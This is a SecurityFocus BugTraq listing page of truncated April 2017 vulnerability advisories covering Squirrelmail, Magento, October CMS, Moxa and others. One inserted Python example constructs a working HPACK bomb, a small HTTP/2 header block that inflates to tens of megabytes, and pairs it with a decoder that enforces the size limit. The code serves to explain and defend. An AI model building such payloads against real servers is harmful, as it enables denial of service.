BugTraq Mode:
(Page 1 of 1712)  1 2 3 4 5 6 7 8 9 10 11  Next >
CVE-2017-7192: Starscream library before 2.0.4 allows SSL pinning bypass 2017-04-21
Security Advisories (security advisories centralway com)
Product: Starscream websocket library
Severity: LOW
CVE Reference: CVE-2017-7192
Type: SSL Pinning bypass / Information disclosure

Abstract
--------

WebSocket.swift in Starscream before 2.0.4 allows an SSL Pinning
bypass because of incorrect management of the certValidated variable
(it can be set

[SECURITY] [DSA 3831-1] firefox-esr security update 2017-04-19
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

------------------------------------------------------------------------
Debian Security Advisory DSA-3831-1 security (at) debian (dot) org
https://www.debian.org/security/ Moritz Muehlenhoff
April 20, 2017

[HITB-Announce] HITB GSEC 2017 CFP Closes April 30th 2017-04-19
Hafez Kamal (aphesz hackinthebox org)
FINAL CALL!

CFP for the 3rd annual Hack In The Box GSEC conference in Singapore
closes on the 30th of April!

Call for Papers: http://gsec.hitb.org/cfp/
Event Website: http://gsec.hitb.org/sg2017/

HITB GSEC is a 2-day deep knowledge security conference where attendees
get to vote on the final agen

October CMS v1.0.412 several vulnerabilities 2017-04-19
Anti Räis (antirais gmail com)
October CMS v1.0.412 several vulnerabilities
############################################

Information
===========

Name: October CMS v1.0.412 (build 412)
Homepage: http://octobercms.com
Vulnerability: several issues, including PHP code execution
Prerequisites: attacker has to be auth

DefenseCode ThunderScan SAST Advisory: Ultimate Form Builder Cross-Site Scripting (XSS) Vulnerability 2017-04-19
DefenseCode (defensecode defensecode com)

DefenseCode ThunderScan SAST Advisory
Ultimate Form Builder
Cross-Site Scripting (XSS) Vulnerability

Advisory ID: DC-2017-01-027
Software: Ultimate Form Builder WordPress plugin
Software Language: PHP
Version: Various
Vendor Status: Vendor contacted
Rele

CVE-2017-7220. OpenText Documentum Content Server: privilege evaluation using crafted RPC save-commands. 2017-04-19
Andrey B. Panfilov (andrew panfilov tel)
CVE Identifier: CVE-2017-7220
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available
PoC:

https://gist.github.com/andreybpanfilov/d879248

CVE-2017-7692: Squirrelmail 1.4.22 Remote Code Execution 2017-04-19
Filippo Cavallarin (filippo cavallarin wearesegment com)
Advisory ID: SGMA17-001
Title: Squirrelmail Remote Code Execution
Product: Squirrelmail
Version: 1.4.22 and probably prior
Vendor: squirrelmail.org
Type: Command Injection
Risk level: 4 / 5
Credit:

[slackware-security] minicom (SSA:2017-108-01) 2017-04-19
Slackware Security Team (security slackware com)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security] minicom (SSA:2017-108-01)

New minicom packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,
14.2, and -current to fix a security issue.

Here are the details from the Slackware 14.2 ChangeLog:
+--------------------

CVE-2017-7615 Mantis Bug Tracker v1.3.0 / 2.3.0 Pre-Auth Remote Password Reset 2017-04-18
apparitionsec gmail com (hyp3rlinx)
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt
[+] ISR: ApparitionSec

Vendor:
================
www.mantisbt.org

Product:
==================

[CVE-2017-5661] Apache XML Graphics FOP information disclosure vulnerability 2017-04-18
Simon Steiner (simonsteiner1984 gmail com)
CVE-2017-5661:
Apache XML Graphics FOP information disclosure vulnerability

Severity:
Medium

Vendor:
The Apache Software Foundation

Versions Affected:
FOP 1.0 - 2.1

Description:
Files lying on the filesystem of the server which uses batik can
be re

[ANNOUNCE] HPACK Bomb Attack vulnerability in ATS - CVE-2016-5396 2017-04-17
Bryan Call (bcall apache org)
There is a vulnerability in ATS with the HPACK Bomb Attack that can lead to a DoS. Versions 6.0.0 to 6.2.0 are affected. Please upgrade to ATS 6.2.1 or 7.0.0.

Downloads:
https://trafficserver.apache.org/downloads

Jira Ticket:
https://issues.apache.org/jira/browse/TS-5019

CVE
https://www.cve.m

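The HPACK bomb named in the announcement above, reconstructed as an added example (Python, constructed data; this is not Apache Traffic Server code and not part of the post). A single "literal with incremental indexing" field stores a large value in the receiver's dynamic table, and every following one-byte indexed reference makes the decoder re-emit that value, so a block of a few kilobytes expands to tens of megabytes of headers. The decoder here is intentionally minimal (assumptions: no Huffman-coded strings and no static table, which the bomb does not need) and shows the fix a decoder needs: enforce the advertised SETTINGS_MAX_HEADER_LIST_SIZE while decoding, before the expanded list is materialized.

```python
"""HPACK bomb (RFC 7541 dynamic-table amplification) and the decoder-side bound.
Added example with constructed data; not ATS code. Decoder simplifications
(assumptions): no Huffman strings, no static table."""
from __future__ import annotations

STATIC_TABLE_LEN = 61       # RFC 7541 Appendix A; dynamic entries start at index 62
DEFAULT_TABLE_SIZE = 4096   # RFC 7540 default SETTINGS_HEADER_TABLE_SIZE


def encode_int(value: int, prefix_bits: int, flags: int = 0) -> bytes:
    """RFC 7541 section 5.1 integer with an N-bit prefix; `flags` fills the high bits."""
    limit = (1 << prefix_bits) - 1
    if value < limit:
        return bytes([flags | value])
    out = bytearray([flags | limit])
    value -= limit
    while value >= 128:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)


def decode_int(data: bytes, pos: int, prefix_bits: int) -> tuple[int, int]:
    limit = (1 << prefix_bits) - 1
    value = data[pos] & limit
    pos += 1
    if value < limit:
        return value, pos
    shift = 0
    while True:
        b = data[pos]
        pos += 1
        value += (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos


def encode_string(s: bytes) -> bytes:
    """Raw (non-Huffman) string literal: H=0, 7-bit length prefix, then the bytes."""
    return encode_int(len(s), 7) + s


def build_hpack_bomb(value_len: int = 4000, repeats: int = 16384) -> bytes:
    """Constructed attack block: one literal with incremental indexing (0x40, new
    name) stores a large entry in the peer's dynamic table; each following byte
    0xBE is an indexed reference to dynamic index 62, i.e. that entry."""
    assert 1 + value_len + 32 <= DEFAULT_TABLE_SIZE, "entry must fit the table"
    literal = b"\x40" + encode_string(b"x") + encode_string(b"A" * value_len)
    indexed = encode_int(STATIC_TABLE_LEN + 1, 7, flags=0x80)   # == b"\xbe"
    return literal + indexed * repeats


class HeaderListTooLarge(Exception):
    """Decoded header list exceeded the advertised SETTINGS_MAX_HEADER_LIST_SIZE."""


def header_list_size(headers: list[tuple[bytes, bytes]]) -> int:
    """RFC 7540 section 6.5.2 accounting: name + value + 32 octets per field."""
    return sum(len(n) + len(v) + 32 for n, v in headers)


def decode_header_block(block: bytes, max_header_list_size: int | None = None
                        ) -> list[tuple[bytes, bytes]]:
    """Decode an HPACK block; limit None reproduces the unbounded (vulnerable) case."""
    dynamic: list[tuple[bytes, bytes]] = []     # newest first: dynamic[0] is index 62
    table_max, table_size = DEFAULT_TABLE_SIZE, 0
    headers: list[tuple[bytes, bytes]] = []
    list_size, pos = 0, 0

    def read_string(p: int) -> tuple[bytes, int]:
        if block[p] & 0x80:
            raise NotImplementedError("Huffman-coded string (not needed here)")
        length, p = decode_int(block, p, 7)
        return block[p:p + length], p + length

    def lookup(index: int) -> tuple[bytes, bytes]:
        if index <= STATIC_TABLE_LEN:
            raise NotImplementedError("static table omitted in this example")
        return dynamic[index - STATIC_TABLE_LEN - 1]   # IndexError = malformed block

    def evict() -> None:
        nonlocal table_size
        while table_size > table_max:
            n, v = dynamic.pop()
            table_size -= len(n) + len(v) + 32

    while pos < len(block):
        b = block[pos]
        if b & 0x80:                                  # indexed header field
            index, pos = decode_int(block, pos, 7)
            name, value = lookup(index)
        elif b & 0x20 and not b & 0x40:               # dynamic table size update
            table_max, pos = decode_int(block, pos, 5)
            if table_max > DEFAULT_TABLE_SIZE:
                raise ValueError("size update above the negotiated maximum")
            evict()
            continue
        else:                                         # literal: 6-bit prefix if indexed, else 4-bit
            add_to_table = bool(b & 0x40)
            index, pos = decode_int(block, pos, 6 if add_to_table else 4)
            name = lookup(index)[0] if index else None
            if name is None:
                name, pos = read_string(pos)
            value, pos = read_string(pos)
            if add_to_table:
                dynamic.insert(0, (name, value))
                table_size += len(name) + len(value) + 32
                evict()
        list_size += len(name) + len(value) + 32      # the check the bomb relies on being absent
        if max_header_list_size is not None and list_size > max_header_list_size:
            raise HeaderListTooLarge(f"{list_size} > {max_header_list_size} octets")
        headers.append((name, value))
    return headers


def rejected(block: bytes, limit: int) -> bool:
    """True when a decoder enforcing `limit` refuses the block instead of expanding it."""
    try:
        decode_header_block(block, max_header_list_size=limit)
    except HeaderListTooLarge:
        return True
    return False


if __name__ == "__main__":
    bomb = build_hpack_bomb()
    expanded = decode_header_block(bomb)              # unbounded decode
    print(f"{len(bomb)} bytes on the wire -> {header_list_size(expanded)} octets of headers")
    print("bounded decoder (16 KiB list limit) rejects it:", rejected(bomb, 16384))
```

The default bomb is about 20 KB on the wire and decodes to roughly 66 MB of header-list accounting; a decoder that checks the running list size against its advertised limit stops after the fifth field, long before the memory is spent.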
Watchguard Fireware XXE DoS & User Enumeration 2017-04-17
David Fernandez (david fdmv gmail com)
Watchguard's Firebox and XTM are a series of enterprise grade network
security appliances providing advanced security services like next
generation firewall, intrusion prevention, malware detection and
blockage and others. Two vulnerabilities were discovered affecting the
XML-RPC interface of the

concrete5 v8.1.0 Host Header Injection 2017-04-14
apparitionsec gmail com (hyp3rlinx)
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CONCRETE5-v8.1.0-HOST-HEADER-INJECTION.txt
[+] ISR: ApparitionSec

Vendor:
==================
www.concrete5.org

Product:
================
concrete5

[slackware-security] bind (SSA:2017-103-01) 2017-04-13
Slackware Security Team (security slackware com)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security] bind (SSA:2017-103-01)

New bind packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,
14.2, and -current to fix security issues.

Here are the details from the Slackware 14.2 ChangeLog:
+--------------------------+

[security bulletin] HPESBGN03728 rev.1 - HPE Operations Agent using OpenSSL, Remote Denial of Service (DoS), Unauthorized Access to Data 2017-04-13
security-alert hpe com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Note: the current version of the following document is available here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03728en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbgn03728en_us

Version: 1

HP

[SYSS-2017-009] agorum core Pro - Improper Restriction of XML External Entity Reference ('XXE') 2017-04-13
erlijn vangenuchten syss de
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2017-009
Product: agorum core Pro
Manufacturer: agorum Software GmbH
Affected Version(s): 7.8.1.4-251
Tested Version(s): 7.8.1.4-251
Vulnerability Type: Improper Restriction of XML External Entity Reference ('XXE') (CWE-611)
Risk Le

[SYSS-2017-008] agorum core Pro - Cross-Site Request Forgery 2017-04-13
erlijn vangenuchten syss de
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2017-008
Product: agorum core Pro
Manufacturer: agorum Software GmbH
Affected Version(s): 7.8.1.4-251
Tested Version(s): 7.8.1.4-251
Vulnerability Type: Cross-Site Request Forgery (CWE-352)
Risk Level: Medium
Solution Status: Open
M

[SYSS-2017-007] agorum core Pro - Cross-Site Scripting 2017-04-13
erlijn vangenuchten syss de
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2017-007
Product: agorum core Pro
Manufacturer: agorum Software GmbH
Affected Version(s): 7.8.1.4-251
Tested Version(s): 7.8.1.4-251
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Open
Manufactu

[SYSS-2017-006] agorum core Pro - Insecure Direct Object Reference 2017-04-13
erlijn vangenuchten syss de
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2017-006
Product: agorum core Pro
Manufacturer: agorum Software GmbH
Affected Version(s): 7.8.1.4-251
Tested Version(s): 7.8.1.4-251
Vulnerability Type: Insecure Direct Object Reference (CWE-932)
Risk Level: High
Solution Status: Ope

[SYSS-2017-005] agorum core Pro - Persistent Cross-Site Scripting 2017-04-13
erlijn vangenuchten syss de
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2017-005
Product: agorum core Pro
Manufacturer: agorum Software GmbH
Affected Version(s): 7.8.1.4-251
Tested Version(s): 7.8.1.4-251
Vulnerability Type: Persistent Cross-Site Scripting (CWE-79)
Risk Level: High
Solution Status: Open

April 2017 - HipChat Server Advisory 2017-04-13
Matthew Hart (mhart atlassian com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

CVE ID:

* CVE-2017-7357.

Product: Hipchat Server.

Affected Hipchat Server product versions:
All versions < 2.2.3

Fixed Hipchat Server product versions:
2.2.3

Summary:
This advisory discloses a critical severity security vulnerability
that was

DefenseCode Security Advisory: Magento 0day Arbitrary File Upload Vulnerability (Remote Code Execution, CSRF) 2017-04-12
DefenseCode (defensecode defensecode com)

DefenseCode Security Advisory
Magento 0day Arbitrary File Upload Vulnerability
(Remote Code Execution, CSRF)

Advisory ID: DC-2017-04-003
Software: Magento CE
Software Language: PHP
Version: 2.1.6 and below
Vendor Status: Vendor contacted / Not fixed
Release Date:

CVE-2017-7456 Moxa MXview v2.8 Denial Of Service 2017-04-12
apparitionsec gmail com (hyp3rlinx)
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec

Vendor:
============
www.moxa.com

Product:
===========
MXView v2.8

Download:
http://ww

CVE-2017-7455 Moxa MXview v2.8 Remote Private Key Disclosure 2017-04-12
apparitionsec gmail com (hyp3rlinx)
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-REMOTE-PRIVATE-KEY-DISCLOSURE.txt
[+] ISR: APPARITIONSEC

Vendor:
============
www.moxa.com

Product:
===========
MXview V2.8

Downloa

CVE-2017-7457 Moxa MX AOPC-Server v1.5 XML External Entity Injection 2017-04-12
apparitionsec gmail com (hyp3rlinx)
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MX-AOPC-SERVER-v1.5-XML-EXTERNAL-ENTITY.txt
[+] ISR: ApparitionSec

Vendor:
============
www.moxa.com

Product:
=======================
MX-AOPC UA

FreeBSD Security Advisory FreeBSD-SA-17:03.ntp 2017-04-12
FreeBSD Security Advisories (security-advisories freebsd org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-17:03.ntp Security Advisory
The FreeBSD Project

Topic:

[SECURITY] [DSA 3829-1] bouncycastle security update 2017-04-11
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

------------------------------------------------------------------------
Debian Security Advisory DSA-3829-1 security (at) debian (dot) org
https://www.debian.org/security/ Moritz Muehlenhoff
April 11, 2017

Microsoft Office OneNote 2007 DLL side loading vulnerability 2017-04-11
Securify B.V. (lists securify nl)
------------------------------------------------------------------------

Microsoft Office OneNote 2007 DLL side loading vulnerability
------------------------------------------------------------------------

Yorick Koster, September 2015

--------------------------------------------------------------

Multiple local privilege escalation vulnerabilities in Proxifier for Mac 2017-04-11
Securify B.V. (lists securify nl)
------------------------------------------------------------------------

Multiple local privilege escalation vulnerabilities in Proxifier for Mac
------------------------------------------------------------------------

Yorick Koster, April 2017

------------------------------------------------------

[SECURITY] CVE-2017-5648 Apache Tomcat Information Disclosure 2017-04-10
Mark Thomas (markt apache org)
CVE-2017-5648 Apache Tomcat Information Disclosure

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
Apache Tomcat 9.0.0.M1 to 9.0.0.M17
Apache Tomcat 8.5.0 to 8.5.11
Apache Tomcat 8.0.0.RC1 to 8.0.41
Apache Tomcat 7.0.0 to 7.0.75
Apache Tomcat 6.0.x is not affected

Descrip

Copyright 2010, SecurityFocus